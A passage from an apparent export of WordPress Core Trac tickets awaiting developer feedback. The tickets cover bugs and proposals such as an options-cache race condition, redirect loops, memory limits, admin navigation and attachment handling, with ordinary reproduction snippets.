like Akismet, a value gets saved into ""wp_options"" under the option name ""recently_activated"". The value looks like: ''a:1:{s:19:""akismet/akismet.php"";i:1497201452;}'' When you reactivate Akismet, the value is updated and resets the option back to look like this: ''a:0:{}'' '''The Bug.''' When you deactivate Akismet and delete akismet, the ""recently_activated"" option keeps this in the option value. ''a:1:{s:19:""akismet/akismet.php"";i:1497201452;}'' when it should reset back to ''a:0:{}''" GeekStreetWP Future Releases 37115 recent canonical change is giving an infinite 301 redirect loop Canonical 4.4.2 normal normal defect (bug) new dev-feedback 2016-06-16T16:26:39Z 2019-06-04T19:39:05Z "Hello, For 4.5.2 in canonical.php line 175, in prior versions there was an elseif condition which was removed. Can you please add it back? && isset($wp_query->queried_object) && For example, when we have akamai injecting GET parameters to our home page, it just goes in an infinite 301 loop due to line 175 now evaluating TRUE when in the past it would evaluate as FALSE, and we'd like that back. Please and thank you awesome wordpress team!" solomon123br Future Releases 42167 Reading -> Static Page - domain/page/1111 duplicates home page General 4.8.2 normal normal Awaiting Review defect (bug) new dev-feedback 2017-10-10T13:59:18Z 2017-10-10T19:06:09Z When I set a static page for Home, every url typing after domain with /page/<number> opens home page with http code 200. This is for all WP versions. dqnisoma Future Releases 40825 Re-addressing validation/sanitization of IDs to allow filtering before WP_Post (and others) database query Posts, Post Types 4.7.5 normal normal Awaiting Review enhancement new dev-feedback 2017-05-20T00:00:04Z 2017-09-26T21:47:27Z "The following ticket spawned from a desire to import content from outside of the WordPress database but have it treated as a native content type. A concept that has a clear audience that desires this functionality (see ticket: #12955) and has been addressed in a number of different ways. I believe the least impactful way to address this ''without'' removing the 'final' keyword from the WP_Post class that also improves standards for validation and sanitization of the ID value typically passed to get_posts() is to use the ID as a sort-of 'decorator' unto itself. When merging the content from multiple sources to be displayed in a theme the biggest conflict to arise is duplication of IDs. Since the remote source is ignorant to the ID numbers already in use in the wp_posts table, a requirement for a ""decorated"" ID determined. WordPress currently does not have a standard method for validating the format of the variable that will ultimately be passed to get_post() to create a new WP_Post object. The following methods are implemented in core files to attempt to sanitize '''''or''''' validate the value passed as an ID ^(*see links for pro/cons of usage in WP)^: * [https://gist.github.com/LinzardMac/b27e738aee52cb3e45c1909fb555cec5 (int) Typecast / intval()] * [https://gist.github.com/LinzardMac/0d1915dfe78fc68f0b3c64d50cf2cb41 is_numeric()] * [https://gist.github.com/LinzardMac/31ed99f8faa34ffad6e666f213e99870 absint()] == '''My Suggestion''' == I recommend creating a new function that will standardize the validation and sanitization of ID numbers that are being passed to a database query. All instances of is_numeric, (int), intval(), and absint() that are used as a way to validate or sanitize (or both validate and sanitize) an ID number that is passed to a query from an external function should be replaces with a new function that will serve both purposes. The new function will return a falsey response OR throw an exception when validation fails or if validation passes, will sanitize the value to a format compatible with the typical MYSQL type for the ID column (bigint). Inside of this new function we can include a filter that will allow developers to override certain restrictions, specifically for allowing external content to be treated as a WP_Post object or some other native content that commonly would exist in WordPress’ database. Since WP_Post will always look for a cached version of the object before querying the database, we make sure to store all necessary values in the cache before the template is loaded after we run our remote_get. We utilize the concatenated ID which is formatted like 12345-REMOTE as the ID in the cache so as to avoid conflicts w/ existing post IDs that are also stored in the memory cache. The only hurdle to this was the fact that core files were forcibly casting IDs as integers long before a query of any sort were to be made. The argument for sanitizing early was to catch malformations early, but all it seemed to do was force the type early and never truly ""caught"" a bad value passed as an ID. A true “early catch” would either sanitize early w/ a falsey response or Exception and/or find the cached version as early as the sanitization so as to avoid the rest of the process of getting the WP_Post instance anyways. Available in the following gist is my suggestion for a better validation function I called ```is_valid_id()```, an example of how filters can be used on this sanitization function to allow external content to be treated as if it was a WP_Post object, and it's usage within a core file that previously used one of the subpar validation functions ( in this case meta.php using is_numeric() ) *comments in the file are just opinions and alternative thoughts I had while crafting this https://gist.github.com/LinzardMac/38bbe22feb0b0a3fbabfcf64d797cd80 !** It could be worthy of note that I have been using some version of this code in a live production site for the last 4 months without any changes needed to plugins or template files to account for this ""non native"" content. " LindsayBSC Future Releases 29341 Raise default value for WP_MEMORY_LIMIT in wp-includes/default-constants.php Bootstrap/Load 4.0 normal normal Awaiting Review enhancement new dev-feedback 2014-08-23T19:45:21Z 2024-03-17T04:33:21Z "wp-includes/default-constants.php currently has a default value for WP_MEMORY_LIMIT of 40Mb (or 64Mb for multisite). The effect of this constant is that if the current value of ini_get( 'memory_limit' ) is less, then ini_set() is used to raise it to at least WP_MEMORY_LIMIT. This default is fine, if your site has few plugins. When the constant was brought in (looks like 3.0, from the comment in the code), sites tended to have fewer plugins, and need less memory. It is not clear exactly what the rationale behind the default choice for WP_MEMORY_LIMIT is, and what data it is based upon. Nevertheless, I get to read a lot of log files through support for one of my plugins, and it is not uncommon for me to see sites where PHP memory use has exceeded 40Mb. It is not uncommon for me to have to advise someone on how to raise their PHP memory limit, because they are trying to clone their site into something like MAMP, which apparently has a lower limit than this (can't verify: I have no Mac), and the WP default is too low to then load their site successfully. Based on my (admittedly anecdotal) experiences, I would recommend 64Mb or 80Mb as a much more suitable default in 2014 (and a corresponding increase for multisite), if the aim is for users to not be surprised by a lack of memory. I don't think that hosting companies will have a problem with this. I have extensive data on default settings of the PHP memory limit, and 99.8% of web hosting companies in that data have 64Mb or more. 99.5% have 96Mb or more." DavidAnderson Future Releases 51372 Race condition causes an autoload option to leak outside of alloptions Cache API 2.2 normal normal Awaiting Review defect (bug) new dev-feedback 2020-09-22T07:55:45Z 2022-06-09T00:26:17Z "There is a problem with `add_option()` which causes an autoloaded item to leak outside of the `alloptions` cache key and into its own item under the `options` group. This becomes pretty broken with persistent object caching, because it leads to a state, where the option is stuck under its own cache key in the `options` group, and is unable to be deleted or updated, while the underlying database value is completely gone. I've been able to reproduce this in multiple ways, with persistent object caching turned on or off. The backend I used in my testing is [https://github.com/Automattic/wp-memcached wp-memcached], but it should be reproducable with any other backend. The first and easiest way is to just add an `error_log()` to wp-includes/options.php in `get_option()` right before `wp_cache_add()` that writes to the `options` group: {{{ function get_option() { ... if ( is_object( $row ) ) { ... if ( $option == 'foo' ) { error_log( 'leaked' ); } wp_cache_add( $option, $value, 'options' ); }}} Now in a simple plugin we can start writing the `foo` option, like this: {{{ add_action( 'init', function() { delete_option( 'foo' ); add_option( 'foo', 'bar' ); die(); } ); }}} The `autoload` flag defaults to `true`, so in this scenario the `foo` item should always end up in the `alloptions` cache key. However, if you run this in multiple parallel threads (with `ab` for example), you'll see the `leaked` message in your error log, which means `foo` has been written to the `foo` key under the `options` group. {{{ ab -c 100 -n 1000 http://localhost/ }}} Another way to reproduce this is to turn on a persistent object caching plugin, visit the site once to trigger a single `add_option()`, then check some of site options and cache keys: {{{ wp option get foo # says bar wp cache get foo options # error, because foo is autoloaded and stored in alloptions wp cache get alloptions options # big array with foo => bar at the end }}} You can also confirm the database value is there: In MySQL: {{{ SELECT * FROM wp_options WHERE option_name = 'foo'; +-----------+-------------+--------------+----------+ | option_id | option_name | option_value | autoload | +-----------+-------------+--------------+----------+ | 2403 | foo | bar | yes | +-----------+-------------+--------------+----------+ }}} Looks good so far. Now run the same `ab` test with concurrent requests, and check again. {{{ wp option get foo # says bar wp cache get foo options # says bar, because the value leaked from alloptions into its own item wp cache get alloptions options # big array, but NO foo => bar }}} And finally, in MySQL shell: {{{ SELECT * FROM wp_options WHERE option_name = 'foo'; Empty set (0.00 sec) }}} At this point the value is gone, and only remains as a stale item in Memcached under the wrong key. Deleting, adding, or updating the item will not work: {{{ $ wp option delete foo Warning: Could not delete 'foo' option. Does it exist? $ wp option add foo bar Error: Could not add option 'foo'. Does it already exist? $ wp option update foo baz Error: Could not update option 'foo'. }}} Flushing Memcached (or having the key evicted) will ""fix"" the stalemate, but will cause the data to be lost forever. Here's a brief overview of what could happen inside `add_option()` in two concurrent threads: {{{ Thread 1: add_option( 'foo', 'bar' ); Thread 2: add_option( 'foo', 'bar' ); 1: .. get_option( 'foo' ) // false 1: .. INSERT INTO // true 2: .. get_option( 'foo' ) 2: .. .. isset( $alloptions[ 'foo' ] ) // false 2: .. .. ->get_row() 2: .. .. wp_cache_add( 'foo', 'bar', 'options' ); // LEAKED 1: $alloptions[] = ... 1: wp_cache_set( 'alloptions', $alloptions, 'options' ); }}} This is then followed by the next `delete_option()` call, which successfully deletes the data from the database and the `alloptions` key, so then future calls to `add_option()` will fail, because `get_option()` will always return the data from cache. I'm not sure about the best way to fix it. Here are a few thoughts: * Maybe `add_option()` should not rely so heavily on `get_option()`, and do its own checks with cache functions, depending on the `autoload` function argument * `delete_option()` could clear both the `alloptions` array item as well as the `$option` key in the `options` group * In `get_option()` if we were unable to retrieve the data from `$alloptions` and option cache, maybe query the `autoload` column together with `option_value`, before just assuming it's a no: {{{ $row = $wpdb->get_row( $wpdb->prepare( ""SELECT option_value, autoload ... }}} Then handle the cache addition differently, based on that autoload flag. This sounds the most reasonable to me, because this is exactly the place where the item is being put into the wrong key, which causes the other problems. I haven't actually tested this with 2.2, but it seems like that's where the `alloptions` vs `options` cache keys appeared inside `get_option()` right around r4855." kovshenin Future Releases 44728 Quick edit for taxonomies is using filtered data Taxonomy 4.9.7 normal normal Awaiting Review defect (bug) new dev-feedback 2018-08-04T17:00:16Z 2019-05-08T19:46:20Z "Looks like #8146 was not fixed, or is back again. To reproduce: * Add a tag with a HTML entity in the name, such as `½`. * Use Quick Edit on the tag page or Quick Edit on the Posts page, and the special character will be shown instead of the `½`. * If you save the tag or post, a new tag with the character is created (instead of using the one with the spelled out entity). I'm unsure of whether the special characters should be in the slug, but my test showed it was." joyously Future Releases 55336 Query strings with reserved characters get wrongly redirected to encoded variant at the root level. General normal normal Awaiting Review defect (bug) new dev-feedback 2022-03-08T09:18:23Z 2022-05-01T03:59:49Z "The asterisk (""*"", ASCII 2A hex) and exclamation mark (""!"" , ASCII 21 hex) are reserved for use as having special significance within specific schemes. Source: https://www.w3.org/Addressing/URL/4_URI_Recommentations.html More here: https://developers.google.com/maps/url-encoding WordPress however, redirects to a URI encoded variant when the query string at the root level contains these reserved characters. So, https://wordpress.org/plugins/?test=123*456 doesn't redirect. While https://wordpress.org/?test=123*456 redirects to https://wordpress.org/?test=123%2A456. This is quite problematic for all WordPress sites that use for example Google Analytics 4 (GA4) cross-domain tracking. GA4 relies on a query string containing asterisks. Source: https://support.google.com/analytics/answer/10071811?hl=en " madstegge Future Releases 39666 "Put front page on top of ""All pages"" list" Posts, Post Types normal normal Future Release enhancement new dev-feedback 2017-01-23T03:33:36Z 2020-02-27T21:57:27Z "I'd like to see the front page and blog page as first elements in the pages list (if such are set of course), no matter what priority they may have. What do you think? Screenshot follows." Presskopp Future Releases 17115 Publishing an empty post results in success Posts, Post Types 3.1 normal normal Awaiting Review defect (bug) new dev-feedback 2011-04-12T11:32:50Z 2020-05-03T23:40:21Z "'''Steps to reproduce:''' 1. Go to Add New post screen 1. Publish post 1. Success message is displayed with link to initial auto-draft of post The issue can be traced back to the `editpost` switch case in `post.php` (line 204), which calls `edit_post()` and `redirect_post()`. `edit_post()` saves any meta values passed with the post to the auto-draft, which isn't necessarily desirable, and returns the auto-draft post ID. `redirect_post()` then defaults to status message code 6 which incorrectly reports success in publishing." kawauso Future Releases 59971 Publishing a post in QuickEdit forces Date to NOW Quick/Bulk Edit 6.4 normal normal Awaiting Review defect (bug) new dev-feedback 2023-11-27T17:32:22Z 2023-12-05T09:13:21Z "I use to give post-drafts a particular publishing date in the past (for ordering reasons when i publish them later on). When I publish a post with a given date in Editing Mode, the publishing date stays my inserted day. When I publish a post with a given date in Quick-Edit, the publishing date always gets forced to NOW. (This also happens when I bulk-edit several posts) I checked that with older versions: Until WordPress 6.2.3 it was possible to publish a post with Quick-Edit and keep my given publishing date. It also worked when bulk-editing several posts. I think this might be a bug, maybe somehow related to the fixed ticket #59125? " snoffel Future Releases 47651 Provide required PHP version for plugins with minimum PHP requirement Site Health 5.2 normal normal Awaiting Review enhancement new dev-feedback 2019-07-04T16:13:52Z 2021-06-15T16:51:58Z "Hello, When a plugin has an update but the update bumps the minimum required PHP version to a version higher than the server's current setup it would be very helpful to provide that information in the messaging. I had to go to the plugin page to find it's minimum required PHP version. Current messaging; `This update doesn't work with your version of PHP. Learn more about updating PHP.` Would be nice to have something like; `This update requires a minimum of PHP 7.2 which is higher than your version of PHP. Learn more about updating PHP.` OR a simpler and shorter version `This update requires a minimum of PHP 7.2. Learn more about updating PHP.` Appreciate any thoughts" garrett-eclipse Future Releases 23413 Provide query result data to custom user columns Users normal normal enhancement new dev-feedback 2013-02-07T15:22:53Z 2019-06-05T06:39:04Z "When the filter manage_users_custom_column is triggered, it sends an empty string for the value field. Since it's easy enough to extend the WP_User_Query with extra fields, it would be good to have those fields passed through if they exist to save having to requery the database with the user_id parameter to get the data. I have attached a patch to show what I mean." JohnC28 Future Releases 51928 Provide plugin/theme update failure data to dot org Upgrade/Install normal normal Future Release task (blessed) assigned dev-feedback 2020-12-03T19:44:16Z 2023-07-05T18:15:26Z "With plugin auto-updates in core there have been instances of update failures leaving the user's site without the update and without any idea why the update failed. We receive core auto-update failure data to dot org and receiving plugin/theme failure data would help significantly in determining the causes of these failures. I'm mostly guessing from how `class-core-upgrader.php` sends failure data via `wp_version_check( $stats )` and I've added similar data and a call to `wp_update_{plugins|themes}( $stats )` in `class-wp-upgrader.php` Thanks @pbiron If it actually does send the data to dot org it could be useful. This requires the return of `WP_Error`s at potential points of failure. I have added one of these in #51857. Feedback from the dot org maintainers will be needed." afragen Future Releases 55228 Provide Option to Remove Password Visibility Button and Dashicons from WordPress' Login Form Security 5.9.1 normal normal Awaiting Review feature request new close 2022-02-22T19:08:39Z 2022-02-25T16:15:23Z "**Request:** I would like to recommend adding a feature to WordPress that will allow the removal of WordPress' login form password visibility button (toggle) and dashicons (eyes). **Details:** https://ibb.co/Xp2Mh8P **Reasons:** (1) Security Enhancement (2) Cleaner UI **Implementation:** (1) Add a new checkbox field label, titled ""**Login Form**"", with the following checkbox text: ""**Disable Password Visibility Button and Dashicons**"" to **WordPress Dashboard > Settings > General** (2) When the checkbox is selected, the code associated with the password visibility button and dashicons is removed, or, activates the code snippet [provided here]https://wordpress.org/support/topic/help-appreciated-remove-visibility-eye-dashicon-from-wp-login-form/. **Scenario:** A website Administrator goes to his/her WordPress login page and login form is auto-filled by the browser but the ""Log In"" button is never clicked. Suddenly, the Administrator is summoned away from his/her desk leaving open the opportunity for a co-worker, visitor, disgruntled employee, or ""hacker in disguise"" to click the password visibility button thus exposing critical website login information. A quick toggle back to ""hidden"" by the perpetrator and the Administrator will never know what happened. **Conclusion:** By implementing this feature request, WordPress is offering its Administrators an optional, valuable login security layer. Thank you for reading!" generosus Future Releases 58808 Proposal: track object cache type in update checks Upgrade/Install normal normal Awaiting Review enhancement new dev-feedback 2023-07-14T10:54:07Z 2023-07-14T16:49:23Z "Related: #56751, #48116 I think it would be helpful to send the `wp_using_ext_object_cache()` value as part of the update requests. We already send the list of installed PHP extensions, so it's possible to know whether e.g. redis or memcached are installed, but not if they are actually used. Ideally we would also know the exact type of object cache that is being used (e.g. if it's actually redis or memcached or something else). That would be also very useful for the `wp cache type` command, [https://github.com/wp-cli/cache-command/issues/68#issuecomment-1433755427 as suggested here]. This could be done via `WP_Object_Cache::get_type()` and a `wp_cache_type()` function for example." swissspidy Future Releases 49509 Proposal: support Server-Timing in core Bootstrap/Load normal normal Awaiting Review feature request new dev-feedback 2020-02-25T08:00:03Z 2021-01-12T10:15:52Z [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Server-Timing Server-Timing] is a new HTTP header to measure server performance. Would be a very useful tool in maintenance mode. Oreolek Future Releases 47012 Proposal: Simplify WordPress Admin Navigation Administration normal normal Future Release enhancement new dev-feedback 2019-04-22T15:40:53Z 2022-02-08T07:56:17Z "About 3 months ago [https://wordpress.slack.com/archives/C02S78ZAL/p1548265528434800?thread_ts=1548092047.364700&cid=C02S78ZAL joen shared some rough mockups] in Slack for proposed changes to the left sidebar navigation in core. My goal below (with Joen’s blessing) is to resurface those mockups a little more publicly to see if we can gather some more feedback and potentially gain a little more momentum with this project. === Summary The current sidebar has served us well for a long time. But with a few improvements, we can improve accessibility and usability, and allow it to better scale to extensions. === Challenges with the current design * The hover/flyout menus are difficult to make accessible, and they do not scale well to mobile interfaces. * There are a lot of top-level menu items that are rarely if ever used, contributing to cognitive weight by still being permanently visible. * Given the additional menu items that plugin add, people are likely to end up with many menu items, despite a large number of them perhaps not being used that often. === Mockup **Important disclaimer:** this is just an initial concept, it is subject to feedback and discussion and iterations: [[Image(menu-mockup.png)]] Props to joen for coming up with this v1 concept. === Major Changes * Flyout menus are replaced with accordion behavior. This scales all the way from mobile to desktop, and affords better accessibility. * Menu is made 80px wider (240px vs. 160), affording a 14px minimum font size for all items, perhaps bigger icons in the future, more relaxed spacing, enhancing usability and accessibility. * Sidebar is grouped in major sections, “Site”, “Design”, “Tools” and “Manage”. * “Updates” are moved to a subsection of “Manage”, making Home a single item. * Items related to content on your site (such as “Posts” and “Pages”) are moved under “Site”. * Clicking major menu items just opens or closes the accordion, as opposed to go directly to the first subsection. This unifies the mobile and desktop behavior. You can keep the accordion open if you use it all the time (each click will save state, so you’ll see the same open/closed sections upon page refresh). * All “Settings” subsections are moved under “Manage”, along with “Plugins & Blocks” and “Users”. * Separators group major categories, like “Site” and “Design” together * Dashboard is renamed “Home”, because all of WordPress is a Dashboard, and “Home” is where you can get an overview at a glance. === Custom Post Types & Taxonomies * Custom Post Types show up below Pages (top item) and Posts (2nd item). * A separator cordons these off from Media & Comments, which show content from all. * Categories & Tags, and even custom taxonomies, are accessible from each section, as opposed to having a permanent presence in the sidebar. For example if you have a taxonomy called “Ingredients” tied to “Recipes”, you first click “Recipes”, and on the archive page you can manage existing Ingredients under a tab. The argument for putting them under this page is that taxonomies are usually added in the editor itself, and only managed on the archive pages. * When you have custom post types, an additional, short, separator shows up below the post types. === Where's the ""Add New"" menu item? One idea would be to make this permanently visible in the top toolbar. [[Image(add-button.png)]] Clicking this button produces a dropdown. By moving it there, you have a single destination to create new content, and we reduce the amount of tab-stops in the navigation menu, especially for sites with a lot of custom post types. === Related Helen opened [https://core.trac.wordpress.org/ticket/32678 this ticket] over 4 years ago. There are a number of different ideas and threads in that ticket. If someone decides that these two tickets should be merged, that is fine. === Feedback Please keep in mind that this is just a ''very early, exploratory concept''. Nothing here is set in stone. The goal of this exercise would be to improve the overall usability and accessibility of the left nav. What thoughts, concerns, questions, and feedback do you have?" lessbloat Future Releases 49490 Proposal: New wrapper function and hook for creating attachments Media normal normal Future Release enhancement new dev-feedback 2020-02-21T22:44:38Z 2020-10-07T05:28:16Z "Everywhere you look for the code related to inserting a new attachment you find 3 steps are needed: 1. wp_insert_attachment 2. wp_generate_attachment_metadata 3. wp_update_attachment_metadata I see no reason not to have a wrapper function instead of having these 3 functions being repeated all over core files + 3rd party themes and plugins. Plus, as people commit changes in core mistakes are occurring [ticket:49449]. The most important reason to create this new wrapper function is to improve interoperability by adding a real hook to know when an attachment has been totally processed by core. This is needed by many plugins that work with images or caching. Right now the hook most used to know of a new attachment is `add_attachment` found in `wp_insert_post()`, but this is run before step 2 and 3, therefore attachment metadata has not been created yet. Developers are having to create a custom wrapper function to add this hook (my company included) in their projects and that means attachments inserted via WP Dashboard wont be taken into action. `media_handle_upload()` is a good example of the wrapper function I am talking about, but sadly it goes out of scope by assuming the file will be located in `$_FILES` variable instead of receiving the file by a parameter, therefore is not friendly or future proof. When that function was created I guess it wasn't taken into consideration that files can be uploaded to the server in many ways. Plus is lacking the appropriate hooks too. Even the `WP_REST_Attachments_Controller` had to create custom methods to fulfill a scenario where attachment data is being sent in the body of the request. A fast search in core for `wp_insert_attachment` will illustrate how this function is followed by `wp_generate_attachment_metadata()` and `wp_update_attachment_metadata()` in most cases: * `media_handle_sideload()` * `media_handle_upload()` * `wp_ajax_crop_image()` * `Custom_Background::handle_upload()` * `WP_Site_Icon::insert_attachment()` * `wp_xmlrpc_server::mw_newMediaObject()` * `WP_REST_Attachments_Controller` I wont even mention third party implementations I’ve found. A quick boilerplate... {{{#!php <?php /** * Creates a single attachment. * * @param string|array $args Required. Arguments for inserting a post of type attachment. * @param array $data Required. An array of data for a single file * Like the one supplied by wp_handle_upload() or wp_handle_sideload() * @param string $context Optional. Provide context for hooks (eg. AJAX, REST) * @param bool $wp_error Optional. Whether to return a WP_Error on failure. Default false. * * @return int|WP_Error The attachment ID on success. The value 0 or WP_Error on failure. * * @author Luis Rivera */ function wp_process_attachment ( string|array $args, string $data = false, string $context, bool $wp_error = false ) { /** * Just let us play * Maybe I need to remove a filter base on X condition */ do_action( 'pre_filter_process_attachment', $args, $data, $context ); /** * Allow modifications to the file * First filter because post args may depend on file data */ $data = apply_filters( 'wp_process_attachment_file', $data, $args, $context ); /** * Allow modifications to the post args */ $args = apply_filters( 'wp_process_attachment_args', $args, $data, $context ); /** * Filters whether to short-circuit the process * At last to evaluate values after filters has been applied * * If a non-null value is passed to the filter, all the process will be cancel * * @param mixed $process If null (default) continue process * If is_wp_error() && $wp_error the error will be returned */ $process = apply_filters( 'wp_process_attachment', null, $args, $data, $context ); if ( $process !== null ) { if ( $wp_error && is_wp_error($process) ) { return $process; } return false; } do_action( 'before_process_attachment', $args, $data, $context ); if ( empty( $args['post_title'] ) ) { $args['post_title'] = preg_replace( '/\.[^.]+$/', '', wp_basename( $data['file'] ) ); } if ( empty( $args['post_mime_type'] ) ) { $args['post_mime_type'] = $data['type']; } if ( empty( $args['post_status'] ) ) { $args['post_status'] = 'inherit'; } $attachment_id = wp_insert_attachment( $args, $data['file']); /** Include image functions to get access to wp_generate_attachment_metadata(). */ require_once ABSPATH . 'wp-admin/includes/image.php'; $metadata = wp_generate_attachment_metadata( $attachment_id, $data['file'] ); wp_update_attachment_metadata( $attachment_id, $metadata ); do_action( 'after_process_attachment', $attachment_id); return $attachment_id; } }}} " luisrivera Future Releases 47837 Proposal: Componentized Upgrades Upgrade/Install normal normal Awaiting Review enhancement new dev-feedback 2019-08-05T15:58:02Z 2021-03-02T16:14:50Z "Recently there has been some talk about the cadence of updates for components of WordPress compared to the core updates. The current practice is that new functionality is added into subversions (5.1, 5.2, etc) and only bug fixes are in minor versions (5.2.1, 5.2.2, etc). However there are components that are having releases quicker then core, meaning that users may not see additional functionality until the next version release, which can be months away. This proposal, at a high level, is intended to propose a solution that allows for a user to update components outside of the core updates. === Mockup '''Important''': this is just a concept mockup for discussion purposes to highlight some of the functionality. === Accessibility Note The mockup above and the functionality described below is most likely not the ideal way to implement the functionality in a completely accessible way. Those who are more knowledgable on the subject should be consulted to modify the functionality in a way that works for all users. === Functionality The main concept is to have the ability to update components independently from core if they become available. The mockup above represents a timeline between the currently installed version of Core (v5.2.2 above) and the currently planned version (v5.3). The '''WordPress Core''' line, by default is collapsed and would not show the components below it. This would then function as the current upgrade functionality does and update all components at the same time. Expanded, this allows the user to upgrade individual components as they wish. In the mockup: * '''Black Dots''' indicate the current installed version for Core and components. * '''Green Dots''' are versions available to install. * '''Red Dots''' are unavailable to install (see more below). * '''Yellow Dots''' are next versions in development with estimated release schedule. * '''Red Line''' Current Day. * '''Dotted Line''' future. * '''Solid Line''' past. === Reading The Version State The user has the '''Wordpress Core''', '''Customizer''', '''Site Health''', and '''Passwords''' installed at v5.2.2. They have 4 newer versions of Gutenberg installed and one newer version of the Rest API installed. If the user upgraded Core to v5.2.3, it would update all components to that point, meaning that Core defines the minimum version for all components. On the Gutenberg line, for example, the user has a version installed and can, if they wish, go back up to two versions (two grey dots), however, because of an update change in the version + 2 (first grey dot), they are unable to back port the version before that (two red dots). Perhaps a DB change or something. The user can, however, upgrade an additional version (which was released the same day at v5.2.3 core) but the next newer version requires core to be at v5.2.3 so it is unavailable to update (or another reason, who knows). The '''Site Health''' component is unable to be updated because it might require the newer version of '''Rest API''' as an example. Hovering or clicking on the dots allows the user (either via popup, tool tip or another means) to see details on that release, upgrade to it if available, and link to release notes. On future releases (yellow dots), the information can show the estimated release date, etc. === Expanded Plugin Support The concept above could also be expanded to third-party plug-ins and themes. Integration with Site Health could be included as well, for example, if 5.2.4 required a newer version of PHP then is currently installed, the dot for it would go red and allow the user to see what is blocking the upgrade to it before the release of it." mdwolinski Future Releases 44976 Proposal to add deregister_control_type(), deregister_panel_type() and deregister_section_type() methods to WP_Customize_Manager Customize normal normal Awaiting Review enhancement assigned dev-feedback 2018-09-21T06:17:24Z 2019-06-01T15:47:37Z "Today was the time I wish I am able to remove a registered customizer control. I also have a patch to implement a deregister_control_type()" Collizo4sky Future Releases 54390 Privacy Policy should be generated on the site language (locale) and not on users language Privacy normal normal Awaiting Review enhancement new dev-feedback 2021-11-07T08:59:03Z 2021-11-08T04:48:27Z "If the user chose another language for admin and generated the Privacy Policy page, it was created in its chosen language and not in the site's language (locale). Example: While managing site with German language and English language as personal preference, I've got English Privacy Policy page and not Datenschutzerklärung as I've exected. It can be even better to give a user option to change the default (site's language) to another available one as an added feature." oglekler Future Releases 17183 previous_comments_link and next_comments_link return wrong url with PATHINFO permalinks Permalinks 1.5 normal normal defect (bug) new needs-unit-tests 2011-04-19T20:13:15Z 2019-06-04T20:42:01Z "When using PATHINFO permalinks, previous_comments_link() and next_comments_link() return a wrong link, which renders paged comments useless. Steps to reproduce: Set permalinks to: /index.php/%post_id%/%postname%/ The functions return URLs similar to: /comments-page-1/#comments This URL results in a file not found (if no rewrite rules are available, which should not be necessary if the PATHINFO permalink structure is used). Expected URL: /index.php/comments-page-1/#comments Manual opening the URL results in the expected/correct paged comments page." FireMotion Future Releases 13779 Preview doesn’t work - WP installed in its own directory SergeyBiryukov General 2.9.2 normal normal Future Release defect (bug) reviewing dev-feedback 2010-06-08T01:32:04Z 2022-07-13T17:21:56Z "1. Wordpress is installed on /wp/ subdirectory. 2. Then it was set up to be visible from the site root according to http://codex.wordpress.org/Giving_WordPress_Its_Own_Directory 3. Site works fine 4. [BUG] Preview for posts & pages isn’t working. When I press preview it goes to url like: http://example.com/?preview=true&preview_id=235&preview_nonce=aa28f04 and says ""You do not have permission to preview drafts."". 5. If I type subdirectory name “/wp/” in that url by hands, it shows correct preview: http://example.com/wp/?preview=true&preview_id=235&preview_nonce=aa28f04 6. The situation is getting worse if i'm using permalinks. In that case - there is nothing i can do to see preview. ps: I’ve tested that on clean install. " antares19 Future Releases 38596 Preview Change button does not reflect Custom Page Template General 4.6.1 normal normal Awaiting Review defect (bug) new dev-feedback 2016-10-31T20:08:55Z 2017-09-08T14:17:51Z "When creating 2 or more custom page templates, the Preview Change button is failing to show the correct template after making a switch. Here are steps below. - Create 2 custom page templates in code. - Go to wp-admin and go to Pages - Either use the Sample that ships with WordPress or create a new page - Within page edit mode, under Page Attributes, select a different page template. - Click Preview Change. - You will notice that the preview does not reflect the correct template. You have to push Update in order to see it. " blackawxs Future Releases 60208 Prevent redirect loops Bootstrap/Load normal normal Awaiting Review enhancement new needs-unit-tests 2024-01-07T20:16:15Z 2024-02-07T20:15:22Z "There are all kinds of issues open that deal with redirect loops and their patches try to resolve the symptom. I propose to instead fix the root cause by checking in wp_redirect/wp_safe_redirect if the $location is equal to the current host/request uri and if that's the case to not execute the redirect but wp_die - just like it's done in those function if response code is not in the 3xx range. If a rogue plugin causes this, this will at least give you a hint of what was happening/where to start, when your WP page suddenly starts to reload indefinitely." kkmuffme Future Releases 58801 Prefetch Block Editor from Posts page adamsilverstein Editor normal normal Future Release enhancement assigned needs-unit-tests 2023-07-13T15:44:37Z 2023-12-04T22:00:53Z "One of the most common user journeys in wp-admin for creating or editing a Post is navigating to the Posts page (`wp-admin/edit.php`) then to the Block Editor (either by clicking a post to edit or clicking the ""New Post"" button or sidebar menu). We can greatly increase up the speed with which the editor loads by prefetching the edit screen once the user reaches the Posts page. Prefetch will ""prime the html cache"" for all of the resources needed by the editor, resulting in the editor loading much faster for users. Note: since users can also reach the editor from the wp-admin bar, we might want to consider adding prefetch when the user interacts or opens the ""New"" menu. However, to keep this initial proposal small and easier to test I decided to limit the scope to the Posts page." adamsilverstein Future Releases 56909 pre_recurse_dirsize filter cannot be used to fill up dirsize_cache and thus breaks performance Networks and Sites 5.6 normal normal Awaiting Review defect (bug) new dev-feedback 2022-10-26T06:09:29Z 2022-10-26T06:09:29Z "In 5.6.0 a new filter was introduced to the dirsize calculation `pre_recurse_dirsize`. After that filter was introduced the dirsize cache was modified to store each folders size separately for a massive performance increase ( part of https://core.trac.wordpress.org/ticket/19879 ). https://github.com/WordPress/wordpress-develop/blob/trunk/src/wp-includes/functions.php#L8287 This second change lead to a state where the `pre_recurse_dirsize` filter is kind of useless. One cannot access or modify the dirsize cache within the filter as the `$dirsize_cache` variable is passed by reference to the recursive calls of `recurse_dirsize()`. https://github.com/WordPress/wordpress-develop/blob/trunk/src/wp-includes/functions.php#L8300 Thus using the `pre_recurse_dirsize` filter renders it impossible to use the new, much more efficient dirsize cache based on single folders. I can only fill up the total for the top level folder. If `pre_recurse_dirsize` is used the code would skip these recursive calls to `recurse_dirsize()`. And thus the reference passing of the `$dirsize_cache` and filling it with the subfolder sizes. One would consider that the filter code could set the `$dirsize_cache` or the transient value on its own. This doesn't work as well, as the original code works on an in memory version of the `$dirsize_cache` and will overwrite any changes done within the filter at the end of its code. https://github.com/WordPress/wordpress-develop/blob/trunk/src/wp-includes/functions.php#L8323-L8328 This state leads to the bad situation that using the `pre_recurse_dirsize` filter will always lead to worse performance. Although the idea behind introducing it was to open up for performance improvements. I am currently unsure how to fix this in a smart way and am open for any thoughts and suggestions. (Maybe bad) Ideas I had: - Pass the `$dirsize_cache` by the reference to the filter (technically impossible as far as I know) - Add another filter to disable the dirsize cache saving in `recurse_dirsize` to handle everything on our own (would allow full backward compat) - Move the `pre_recurse_dirsize` to 